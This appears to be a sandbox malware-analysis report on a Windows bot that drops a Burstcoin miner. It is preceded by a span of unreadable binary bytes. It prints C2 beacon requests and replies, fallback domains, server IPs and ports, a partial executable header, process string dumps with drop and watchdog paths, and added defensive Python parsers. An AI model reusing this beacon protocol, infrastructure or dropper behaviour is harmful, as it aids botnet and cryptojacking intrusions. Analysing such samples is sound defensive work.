....GD.E.sY....1..D...d.T.....=.t.."c..P....L..Z.h.k..U..<5.`..D.Rv..w.A{.`?r............ ..&...*U-.....u.Z~...1..U...X. .@M..,...x../^B...^@.QyV.....X.-a.gc..A.Z)P$h.%........S.:.%n.2.]...7T....g..o.s'.^.]O.W..c..17.e...:.........2IH>\Y..j........M<.,\...I.'.S..j\....%.B'x......0...]Go..2/....._m.D...G~...5.....Z ..!,&...<.3}..U?..{1..E%?...@..L>....e<.X....Y=...,."..e~.....Rx.]..[.{..[.*..<.7....J...U.._......`.... .bK..I..Bc.....@k......-.....(.........SF..jv.....q.Q7....3.%.......T......-a..Pwon..y.^..u..'..8.,.....h....n...ylj ..R.=.....|.......U....t.*..K.J0........g...1Z.Q.........R..Mh.'......F......`=.....e.....mn-.2`z.k9'.
<<< skipped >>>
GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 HTTP/1.0
Accept: */*
Connection: close
Host: glasshealth.net
HTTP/1.1 200 OK
Date: Fri, 06 Mar 2015 17:38:11 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 2611
Keep-Alive: timeout=5, max=127
Connection: close
Content-Type: text/html; charset=UTF-8
<!--...top.location="hXXp://glasshealth.net/?fp=gflAhs8IcUd97NIiayKQ7UQN9dlG4+w1rhgSgPDY2wI1o/jF3QTSUXEUvYwZaD8eIVaYzJQ4Lnkr85gq8zHv%2Fg==&prvtof=67h3zsyWRM96HzMguVIw2NdqJ+sg0xsg33t5I9z/LVc=&poru=9L/nBj7txLcevEXVP1cCHBo4ptAm7czfS3iC3M3yaXiYxFUyvUodJ4XBJUStdjN4JAxtw9qGwHb1c7suSo4arypf1Xv3S/4Ku9T0pQXvVchj6kR5kdiaxr8TXn5KM2Mx&cifr=1&method=validate&mode=sox&v=028&sox=3b93ce01";.../*..-->..<script type="text/javascript">...<!--...dimensionUpdated = 0;...function applyFrameKiller()...{....if(window.top != self)....{.....cHeight = 0;.....if( typeof( window.innerHeight ) != 'undefined' ) {.....//Non-IE.....cHeight = window.innerHeight;.....dimensionUpdated = 1;.....} else if( document.documentElement && ( document.documentElement.clientWidth || document.documentElement.clientHeight ) ) {.....//IE 6 in 'standards compliant mode'.....cHeight = document.documentElement.clientHeight;.....dimensionUpdated = 1;.....} else if( document.body && ( document.body.clientWidth || document.body.clientHeight ) ) {.....//IE 4 compatible.....cHeight = document.body.clientHeight;.....dimensionUpdated = 1;.....}.....if( cHeight <= 250 && dimensionUpdated == 1).....{......window.top.location = "hXXp://glasshealth.net/?fp=gflAhs8IcUd97NIiayKQ7UQN9dlG4+w1rhgSgPDY2wI1o/jF3QTSUXEUvYwZaD8eIVaYzJQ4Lnkr85gq8zHv/g==&prvtof=n+scX8txUIS8AicO8bYmmTai1kexrb2ax5CYJ+aQ0SU=&poru=ZfmI6g7Ocz4B2/kwYdn7QBUrOzmbBFIsa/tBlE9Umk/T+gLSwOcUOeOU9JeEHoQOHHVqq7emploCdGlO4+Bejn8FmEfbIk4NvkonDzLYANLGP0zR
<<< skipped >>>
GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 HTTP/1.0
Accept: */*
Connection: close
Host: mightglossary.net
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 7849
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
p3p: CP="CAO PSA OUR"
Set-Cookie: SessionID=1671ce8f-86e8-4303-a81c-b7e9e64fca1e; path=/
Set-Cookie: VisitorID=d8fe5a56-a3a0-4e17-bb31-7f5dc4744215&Exp=3/6/2018 9:38:11 AM; expires=Tue, 06-Mar-2018 17:38:11 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 06 Mar 2015 17:38:10 GMT
Connection: close
<!doctype html>..<html>.....<head>...<meta charset="utf-8"/>...<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"/>...<meta name="viewport" content="width=device-width, initial-scale=1"/>.. ..<title>Mightglossary.net</title>..<meta name="keywords" content=" mightglossary.net" />..<meta name="description" content="" />..<script src='hXXp://code.jquery.com/jquery-latest.min.js' type='text/javascript'></script>..<script language='JavaScript' src='/js/standard.js?rte=1&tm=2&dn=mightglossary.net&tid=1020'></script>..<meta name='google' value='notranslate' />..<script type='text/javascript' language='JavaScript' src='/js/google_caf.js?rte=1&tm=2&dn=mightglossary.net&tid=1020'></script>..<script type='text/javascript' language='JavaScript' src='hXXp://VVV.google.com/adsense/domains/caf.js'></script>..<script type='text/javascript'>..var pageOptions =..{.. 'domainRegistrant' : 'as-drid-2864613873876811',.. 'relatedSearchBaseUrl': 'hXXp://mightglossary.net/?ac=2&slt=8&slr=1&lpt=2',.. 'resultsPageBaseUrl': 'hXXp://mightglossary.net/?ac=2&slt=8&slr=1&lpt=2',.. 'pageLoadedCallback': google_callback,.. 'pubId': 'dp-demandmedia02',.. 'channel': '000001',.. 'terms': '',.. 'optimizeTerms': true,.. 'adtest': 'off',.. 'hl': ''..};..var searchboxBlock =..{.. 'container': 'searchbox',.. 'type': 'searchbox',.. 'width': '300px',.. 'widthSearchButton': 70,..
<<< skipped >>>
GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 HTTP/1.0
Accept: */*
Connection: close
Host: throughcountry.net
HTTP/1.1 200 OK
Date: Fri, 06 Mar 2015 17:38:38 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 2741
Keep-Alive: timeout=5, max=123
Connection: close
Content-Type: text/html; charset=UTF-8
<!--...top.location="hXXp://throughcountry.net/?fp=w7y7FqjVPi+35vATrhHNATKikXPAGv4JZWtAce2QuVXnKYESjSduVewmbPKxY+l+jYoFAHMhvYKLzNN%2B02ULvA==&prvtof=GA+/hPGSv9VyeYxpGNTAJ+t383WcnElKtAsNh4/S3XE=&poru=z8zG8QkJNfFfX7Mwpss/k2tHKSqnfEat5RhDSKRPyPzc5OHfEJBYUN4rkcqt9WZ9n2j3z8tDVR1hTn8BjlJ8Cn414Wi0FLy6uVrKOjlp6+thgUD32HWOvVsD2y4MukR/ah21Yl5XHRM0y6kxBxYOuQ==&cifr=1&method=validate&mode=sox&v=028&sox=3b93ce01";.../*..-->..<script type="text/javascript">...<!--...dimensionUpdated = 0;...function applyFrameKiller()...{....if(window.top != self)....{.....cHeight = 0;.....if( typeof( window.innerHeight ) != 'undefined' ) {.....//Non-IE.....cHeight = window.innerHeight;.....dimensionUpdated = 1;.....} else if( document.documentElement && ( document.documentElement.clientWidth || document.documentElement.clientHeight ) ) {.....//IE 6 in 'standards compliant mode'.....cHeight = document.documentElement.clientHeight;.....dimensionUpdated = 1;.....} else if( document.body && ( document.body.clientWidth || document.body.clientHeight ) ) {.....//IE 4 compatible.....cHeight = document.body.clientHeight;.....dimensionUpdated = 1;.....}.....if( cHeight <= 250 && dimensionUpdated == 1).....{......window.top.location = "hXXp://throughcountry.net/?fp=w7y7FqjVPi+35vATrhHNATKikXPAGv4JZWtAce2QuVXnKYESjSduVewmbPKxY+l+jYoFAHMhvYKLzNN+02ULvA==&prvtof=RZINKQn0zqeuQg1Zvnw5LzJdLdaHRzAxGeAQHwUsVnc=&poru=THlSTGBCi9tQ+Bt5haHsGx6eNyiigepbYiQld2Hh/IxbwX4GyppoiWMJZ25E3QyI71uVyuUy/6%2
<<< skipped >>>
GET /forum/search.php?method=all&flag&mode=sox&v=028&sox=3b93ce01&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: decemberknew.net
HTTP/1.0 200 OK
Date: Fri, 06 Mar 2015 17:39:03 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 2
Server: ATS/5.0.1
ping.5.FLAG
cfg.274."soilunder.net" "longcold.net" "deepsecond.net" "storyocean.net" "monthnext.net" "callmile.net" "longlower.net" "faceboat.net" "muchhappy.net" "shallgrave.net" "nailthere.net" "fieldthan.net" "ableread.net" "sellagain.net" "faceloud.net" "fearstate.net" "drivethirteen.net"
var_user_ip.265.Þp_host% = "picturebecome.net";
Þp_path% = "/dep/";
%no_password% = "0";
%timer% = "180";
%ip% = "205.196.221.133";
%port% = "8079";
%relay_soxid% = "8083";
%thread_timeout% = "300";
%newport% = "31442";
%cpuinfo% = "QEMU Virtual CPU version 0.9.1 (2327 MHz)";
plugin.67369.miner_forced.149.8hGghbvdsfSHvxnjjkJFHDGsf4.win32plot2.exe 12754694899610736661 3b93ce01 107.155.116.121:1669,23.92.65.20:9446,107.155.116.121:80,23.92.65.20:80 0 76.MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........5S..fS..fS..f...fR..f<..f@..f<.-f...fZ..fV..fS..f...f<.,ft..f<..fR..fRichS..f................PE..L......T.....................r.......#............@..........................@............@.................................D...<............................ ..D.......................................@...............@............................text...0........................... ..`.rdata..r-..........................@..@.data....,..........................@....reloc..r.... ......................@..B.......................................................................................................................................
<<< skipped >>>
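The exchange above is the bot's check-in and the server's reply. The GET line carries the bot's parameters (`mode=sox`, an id in `sox=`, `adm=1`, `x64=0`), and the reply body is a sequence of what reads as `<name>.<length>.<payload>` records: `ping`, a `cfg` record listing fallback domains, a `var_user_ip` record of `%key% = "value";` settings (host, path, IP and ports, plus a `%cpuinfo%` value that echoes the analysis VM's QEMU CPU string), and a `plugin` record named `miner_forced` whose descriptor line repeats the `sox` id, names `win32plot2.exe`, lists peer `host:port` pairs and is followed by an MZ header, i.e. a dropped executable. The Python below is an added example, not code from the report or from the malware: it parses the request line, decodes a record stream of that shape and correlates the two. It assumes the dots the report prints stand for single unprintable separator bytes (0x0A is used), and the reply body it parses is constructed from the printed values rather than taken from the raw capture. Reproducing the printed `cfg` domain list yields a payload of exactly 274 bytes, the length printed in the capture, which supports the length-prefixed reading.

```python
"""Decode the 'sox' beacon and the record-structured C2 reply captured above.
Added example, not code from the report or the malware. Assumes the reply is a
stream of <name><sep><length><sep><payload> records and that the '.' printed
by the report is one unprintable separator byte (0x0A here); the reply body
below is constructed from the printed values, not the raw capture."""
import re
from urllib.parse import parse_qsl, urlsplit

SEP = b"\n"  # assumed separator byte

# Request line copied from the capture.
BEACON_REQUEST_LINE = (
    "GET /forum/search.php?method=all&flag&mode=sox&v=028&sox=3b93ce01"
    "&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0")
# Domain list exactly as printed in the cfg record (the capture says cfg.274).
CFG_DOMAINS = [
    "soilunder.net", "longcold.net", "deepsecond.net", "storyocean.net",
    "monthnext.net", "callmile.net", "longlower.net", "faceboat.net",
    "muchhappy.net", "shallgrave.net", "nailthere.net", "fieldthan.net",
    "ableread.net", "sellagain.net", "faceloud.net", "fearstate.net",
    "drivethirteen.net"]

def record(name: bytes, payload: bytes) -> bytes:
    """Encode one length-prefixed record."""
    return name + SEP + str(len(payload)).encode() + SEP + payload

def build_sample_reply() -> bytes:
    """Constructed reply body modelled on the capture (values from the page)."""
    cfg = b" ".join(b'"' + d.encode() + b'"' for d in CFG_DOMAINS) + b" "
    var = SEP.join([
        b'%p_host% = "picturebecome.net";', b'%p_path% = "/dep/";',
        b'%ip% = "205.196.221.133";', b'%port% = "8079";', b'%newport% = "31442";',
        b'%cpuinfo% = "QEMU Virtual CPU version 0.9.1 (2327 MHz)";'])
    descriptor = (b"8hGghbvdsfSHvxnjjkJFHDGsf4.win32plot2.exe 12754694899610736661 "
                  b"3b93ce01 107.155.116.121:1669,23.92.65.20:9446,"
                  b"107.155.116.121:80,23.92.65.20:80 0 76")
    stub_pe = b"MZ\x90\x00\x03\x00\x00\x00\x04\x00"  # constructed stub, not a real PE
    plugin = record(b"miner_forced", descriptor) + SEP + stub_pe
    return SEP.join([record(b"ping", b"FLAG "), record(b"cfg", cfg),
                     record(b"var_user_ip", var), record(b"plugin", plugin)])

def read_record(data: bytes, pos: int) -> tuple:
    """Parse <name><sep><len><sep><payload> at pos -> (name, payload, end)."""
    i = data.index(SEP, pos)
    j = data.index(SEP, i + 1)
    name = data[pos:i].decode("ascii", "replace")
    if not re.fullmatch(r"[A-Za-z_]+", name):
        raise ValueError(f"bad record name at offset {pos}: {name!r}")
    length = int(data[i + 1:j])
    payload = data[j + 1:j + 1 + length]
    if len(payload) != length:
        raise ValueError(f"truncated {name} record: want {length}, got {len(payload)}")
    return name, payload, j + 1 + length

def parse_beacon(request_line: str) -> dict:
    """Split the GET line; keep_blank_values keeps the bare 'flag' parameter."""
    method, target, _version = request_line.split(" ", 2)
    url = urlsplit(target)
    return {"method": method, "path": url.path,
            "params": dict(parse_qsl(url.query, keep_blank_values=True))}

def parse_plugin(payload: bytes) -> dict:
    """Plugin payload = nested descriptor record, separator, then the binary."""
    kind, descriptor, pos = read_record(payload, 0)
    binary = payload[pos + len(SEP):] if payload.startswith(SEP, pos) else payload[pos:]
    fields = descriptor.decode("ascii", "replace").split()
    # fields: <token>.<exe> <20-digit id; fits u64, meaning unconfirmed> <bot id> <peers> ...
    return {"kind": kind, "exe": fields[0].partition(".")[2], "numeric_id": fields[1],
            "bot_id": fields[2], "peers": fields[3].split(","),
            "is_pe": binary.startswith(b"MZ"), "binary_size": len(binary)}

def parse_reply(body: bytes) -> dict:
    """Walk the record stream and pull out the indicator-bearing fields."""
    out = {"domains": [], "config": {}, "plugin": None, "other": {}}
    pos = 0
    while pos < len(body):
        name, payload, pos = read_record(body, pos)
        if body.startswith(SEP, pos):
            pos += len(SEP)
        text = payload.decode("ascii", "replace")
        if name == "cfg":
            out["domains"] = re.findall(r'"([^"]+)"', text)
        elif name == "var_user_ip":
            out["config"] = dict(re.findall(r'%(\w+)% = "([^"]*)";', text))
        elif name == "plugin":
            out["plugin"] = parse_plugin(payload)
        else:
            out["other"][name] = payload
    return out

def correlate(beacon: dict, reply: dict) -> dict:
    """Tie request to reply and flatten the network indicators."""
    bot_id = beacon["params"].get("sox")
    cfg, plugin = reply["config"], reply["plugin"]
    indicators = set(reply["domains"])
    if "p_host" in cfg:
        indicators.add(cfg["p_host"] + cfg.get("p_path", ""))
    if "ip" in cfg and "port" in cfg:
        indicators.add(cfg["ip"] + ":" + cfg["port"])
    indicators.update(plugin["peers"] if plugin else [])
    return {"is_sox_beacon": beacon["params"].get("mode") == "sox" and bot_id is not None,
            "bot_id_in_plugin": bool(plugin) and plugin["bot_id"] == bot_id,
            "indicators": sorted(indicators)}

if __name__ == "__main__":
    print(correlate(parse_beacon(BEACON_REQUEST_LINE), parse_reply(build_sample_reply())))
```

Length-prefixed parsing is what makes the embedded executable recoverable: splitting the body on separators would break inside the PE image, whereas reading `length` bytes carves it cleanly. The `%cpuinfo%` value is a caveat for anyone comparing captures, since it reflects the infected host (here the QEMU sandbox) rather than the operator's configuration.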
GET /IpLocator.htm HTTP/1.0
Accept: */*
Connection: close
Host: VVV.geobytes.com
HTTP/1.0 301 Moved Permanently
Date: Fri, 06 Mar 2015 17:39:04 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.6
Set-Cookie: PHPSESSID=oiihqhdpstgi0amsp89ootkt37; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /IpLocator
Content-Length: 0
Connection: close
Content-Type: text/html
Map
The Malware connects to the servers at the following location(s):
Strings from Dumps
ckxjtyt.exe_2836:
.text
`.rdata
@.data
j.hP0L
@-q}#f
SSSh`D@
~2SSShPJ@
SSShP
SSSh`1C
SQSSSh
}GSSSh
SSh`8E
T$$SSSh
SSSh0`F
tsSSSh
~PSSSh
t>SSSh
vSSSh
FTPjK
FtPj;
C.PjRV
tGHt.Ht&
WS2_32.dll
OLEAUT32.dll
cmd.exe
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
portuguese-brazilian
operator
GetProcessWindowStation
USER32.DLL
GDI32.dll
KERNEL32.dll
GetKeyboardType
USER32.dll
GetCPInfo
GetConsoleOutputCP
GetProcessHeap
ckxjtyt.exe
ubg.exe
AutoConnect Engine WebClient Web Procedure Trap
Key BitLocker Connection WMI Computer Shell
pogwoihcz.exe
{bUdp
f/%xp
$%f-L
? .OS
#,%cyz
.OVko
.gC?m
:C%f{J
zcÃ
%Documents and Settings%\LocalService
|%System%\pogwoihcz.exe
|decemberknew.net
WATCHDOGPROC "c:\windows\system32\ckxjtyt.exe"
%System%\ckxjtyt.exe
mscoree.dll
KERNEL32.DLL
win32plot2.exe_1396:
.text
`.rdata
@.data
.rsrc
@.reloc
GetProcessWindowStation
operator
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
kernel32.dll
%srecyclebin\ver1
%srecyclebin\*
%srecyclebin\%s
%srecyclebin\*_*_*_*
%llu_%llu_%u_%u
%c:\recyclebin\%llu_%llu_%u_%u
%srecyclebin\%llu_%llu_%u_%u
%srecyclebin
Adjusting total nonces to %u to match stagger size
System.PercentFull;
Registry key TileInfo changed!
Registry key PreviewDetails changed!
%s\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
win32burst2.exe
%s %s %s %s %s
KERNEL32.dll
RegEnumKeyExA
RegCreateKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
RegCloseKey
ADVAPI32.dll
GetProcessHeap
GetCPInfo
zcÃ
%System%\binaries_burst4\win32\win32plot2.exe
Bmscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
win32burst2.exe_2548:
.text
`.rdata
@.data
.rsrc
@.reloc
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
GetProcessWindowStation
operator
ChunkSender[%d]: fuck
ChunkSender[%d]: take a break! %d
[%d] Connected to server.
kernel32.dll
recv = %s
POST /burst?requestType=submitNonce&accountId=%llu&nonce=%llu HTTP/1.0
%c:\recyclebin\*
%c:\recyclebin\%s
Error opening file %s
WSAStartup failed: %d
KERNEL32.dll
WS2_32.dll
GetProcessHeap
GetCPInfo
zcÃ
%System%\binaries_burst4\win32\win32burst2.exe
7 7$7(7,7074787
#?,?
? ?$?(?,?0?
@mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
jrhwdmjgunjvubg.exe_2660:
.text
`.rdata
@.data
j.hP0L
@-q}#f
SSSh`D@
~2SSShPJ@
SSShP
SSSh`1C
SQSSSh
}GSSSh
SSh`8E
T$$SSSh
SSSh0`F
tsSSSh
~PSSSh
t>SSSh
vSSSh
FTPjK
FtPj;
C.PjRV
tGHt.Ht&
WS2_32.dll
OLEAUT32.dll
cmd.exe
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
portuguese-brazilian
operator
GetProcessWindowStation
USER32.DLL
GDI32.dll
KERNEL32.dll
GetKeyboardType
USER32.dll
GetCPInfo
GetConsoleOutputCP
GetProcessHeap
ckxjtyt.exe
ubg.exe
AutoConnect Engine WebClient Web Procedure Trap
Key BitLocker Connection WMI Computer Shell
pogwoihcz.exe
{bUdp
f/%xp
$%f-L
? .OS
#,%cyz
.OVko
.gC?m
:C%f{J
zcÃ
%Documents and Settings%\LocalService
%WinDir%\TEMP\jrhwdmjgunjvubg.exe
mscoree.dll
KERNEL32.DLL
pogwoihcz.exe_3840:
.text
`.rdata
@.data
j.hP0L
@-q}#f
SSSh`D@
~2SSShPJ@
SSShP
SSSh`1C
SQSSSh
}GSSSh
SSh`8E
T$$SSSh
SSSh0`F
tsSSSh
~PSSSh
t>SSSh
vSSSh
FTPjK
FtPj;
C.PjRV
tGHt.Ht&
WS2_32.dll
OLEAUT32.dll
cmd.exe
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
portuguese-brazilian
operator
GetProcessWindowStation
USER32.DLL
GDI32.dll
KERNEL32.dll
GetKeyboardType
USER32.dll
GetCPInfo
GetConsoleOutputCP
GetProcessHeap
ckxjtyt.exe
ubg.exe
AutoConnect Engine WebClient Web Procedure Trap
Key BitLocker Connection WMI Computer Shell
pogwoihcz.exe
{bUdp
f/%xp
$%f-L
? .OS
#,%cyz
.OVko
.gC?m
:C%f{J
zcÃ
%Documents and Settings%\LocalService
%System%\pogwoihcz.exe
mscoree.dll
KERNEL32.DLL
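Across these dumps, `ckxjtyt.exe`, `pogwoihcz.exe` and the `jrhwdmjg…ubg.exe` copies share one string set (`WATCHDOGPROC "c:\windows\system32\ckxjtyt.exe"`, the `decemberknew.net` check-in host, `%Documents and Settings%\LocalService`), while `win32plot2.exe` and `win32burst2.exe` carry Burstcoin proof-of-capacity plotter and miner vocabulary (`nonces`, `stagger size`, `%c:\recyclebin\%llu_%llu_%u_%u` plot files, `POST /burst?requestType=submitNonce&accountId=%llu&nonce=%llu`), which fits the `miner_forced` plugin delivered in the C2 reply. The report also prints every dumped string twice. The Python below is an added triage helper, not code from the report or from the sample: it extracts printable strings from a binary the way `strings` does, deduplicates them, matches them against marker strings copied from these dumps to name the component, and pulls out the drop and persistence paths. The byte blobs it scans are constructed stand-ins, not the real executables.

```python
"""Triage the string dumps above: extract printable strings from a binary,
drop duplicated lines, and match marker strings per component.
Added example for this page, not code from the report or the sample. The
marker strings are copied from the dumps; the blobs scanned here are
constructed stand-ins for process dumps, not the real executables."""
import re
from typing import Dict, List

# Marker strings taken from the dumps, grouped by the component they identify.
MARKERS: Dict[str, List[bytes]] = {
    "dropper_watchdog": [
        b'WATCHDOGPROC "c:\\windows\\system32\\',
        b"AutoConnect Engine WebClient Web Procedure Trap",
        b"Key BitLocker Connection WMI Computer Shell",
        b"decemberknew.net",
    ],
    "burst_plotter": [
        b"Adjusting total nonces to %u to match stagger size",
        b"%c:\\recyclebin\\%llu_%llu_%u_%u",
        b"%System%\\binaries_burst4\\win32\\win32plot2.exe",
    ],
    "burst_miner": [
        b"POST /burst?requestType=submitNonce&accountId=%llu&nonce=%llu",
        b"ChunkSender[%d]:",
        b"%System%\\binaries_burst4\\win32\\win32burst2.exe",
    ],
}

# %Var%\... or X:\... followed by printable text: drop/persist path templates.
PATH_RE = re.compile(rb"(?:%[A-Za-z ]+%|\b[A-Za-z]:)\\[\x20-\x7e]+")


def extract_strings(blob: bytes, min_len: int = 4) -> List[bytes]:
    """Printable-ASCII runs of at least min_len bytes, like the `strings` tool."""
    pattern = rb"[\x20-\x7e]{" + str(min_len).encode() + rb",}"
    return [m.group(0) for m in re.finditer(pattern, blob)]


def dedupe(strings: List[bytes]) -> List[bytes]:
    """Keep first occurrences in order; the dumps above print each string twice."""
    seen, out = set(), []
    for s in strings:
        if s not in seen:
            seen.add(s)
            out.append(s)
    return out


def classify(strings: List[bytes], min_hits: int = 2) -> Dict[str, List[bytes]]:
    """{component: matched markers} for every component with >= min_hits.
    Two markers are required so a single shared string does not tag a sample."""
    hits = {}
    for component, markers in MARKERS.items():
        matched = [m for m in markers if any(m in s for s in strings)]
        if len(matched) >= min_hits:
            hits[component] = matched
    return hits


def artifact_paths(strings: List[bytes]) -> List[bytes]:
    """Strings that look like file paths the sample drops or references."""
    return dedupe([s for s in strings if PATH_RE.search(s)])


def build_sample_blob(*components: str) -> bytes:
    """Constructed blob: PE-like magic, non-printable filler, then the markers
    of the named components. Stand-in for a process dump, not real data."""
    filler = bytes(range(0x20)) * 2
    markers = [m for c in components for m in MARKERS[c]]
    return b"MZ\x90\x00" + filler + filler.join(markers) + filler


if __name__ == "__main__":
    for comp in MARKERS:
        found = dedupe(extract_strings(build_sample_blob(comp)))
        print(comp, "->", list(classify(found)), artifact_paths(found))
```

The two-marker threshold matters when components share strings: a dump that carries the watchdog set plus one stray miner string is reported as the dropper only, and `min_hits=1` can be passed when a looser sweep is wanted.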